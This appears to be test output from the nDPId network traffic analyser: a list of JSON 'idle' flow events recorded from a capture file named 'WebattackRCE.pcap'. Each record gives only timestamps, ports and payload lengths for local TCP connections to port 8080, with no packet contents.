+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276837,"flow_last_seen":1576420276837,"flow_idle_time":7560000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49768,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276839,"flow_last_seen":1576420276839,"flow_idle_time":7560000,"flow_min_l4_payload_len":226,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":226,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49770,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276840,"flow_last_seen":1576420276840,"flow_idle_time":7560000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":227,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49772,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276841,"flow_last_seen":1576420276841,"flow_idle_time":7560000,"flow_min_l4_payload_len":238,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":238,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49774,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276842,"flow_last_seen":1576420276842,"flow_idle_time":7560000,"flow_min_l4_payload_len":231,"flow_max_l4_payload_len":231,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":231,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49776,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276844,"flow_last_seen":1576420276844,"flow_idle_time":7560000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49778,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276847,"flow_last_seen":1576420276847,"flow_idle_time":7560000,"flow_min_l4_payload_len":228,"flow_max_l4_payload_len":228,"flow_tot_l4_payload_len":228,"flow_avg_l4_payload_len":228,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49780,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276856,"flow_last_seen":1576420276856,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49782,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276858,"flow_last_seen":1576420276858,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49784,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276859,"flow_last_seen":1576420276859,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49786,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276860,"flow_last_seen":1576420276860,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49788,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276862,"flow_last_seen":1576420276862,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49790,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276863,"flow_last_seen":1576420276863,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49792,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276864,"flow_last_seen":1576420276864,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49794,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276865,"flow_last_seen":1576420276865,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49796,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276866,"flow_last_seen":1576420276866,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49798,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276869,"flow_last_seen":1576420276869,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49800,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276870,"flow_last_seen":1576420276870,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49802,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276871,"flow_last_seen":1576420276871,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49804,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276872,"flow_last_seen":1576420276872,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49806,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276873,"flow_last_seen":1576420276873,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49808,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276874,"flow_last_seen":1576420276874,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49810,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276876,"flow_last_seen":1576420276876,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49812,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276877,"flow_last_seen":1576420276877,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49814,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276879,"flow_last_seen":1576420276879,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49816,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276881,"flow_last_seen":1576420276881,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49818,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276884,"flow_last_seen":1576420276884,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49820,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276885,"flow_last_seen":1576420276885,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49822,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276886,"flow_last_seen":1576420276886,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49824,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276888,"flow_last_seen":1576420276888,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49826,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276890,"flow_last_seen":1576420276890,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49828,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276891,"flow_last_seen":1576420276891,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49830,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276893,"flow_last_seen":1576420276893,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49832,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276894,"flow_last_seen":1576420276894,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49834,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276896,"flow_last_seen":1576420276896,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49836,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276897,"flow_last_seen":1576420276897,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49838,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276900,"flow_last_seen":1576420276900,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49840,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276901,"flow_last_seen":1576420276901,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49842,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276903,"flow_last_seen":1576420276903,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49844,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276904,"flow_last_seen":1576420276904,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49846,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276905,"flow_last_seen":1576420276905,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49848,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276907,"flow_last_seen":1576420276907,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49850,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276908,"flow_last_seen":1576420276908,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49852,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276910,"flow_last_seen":1576420276910,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49854,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276912,"flow_last_seen":1576420276912,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49856,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276913,"flow_last_seen":1576420276913,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49858,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276916,"flow_last_seen":1576420276916,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49860,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 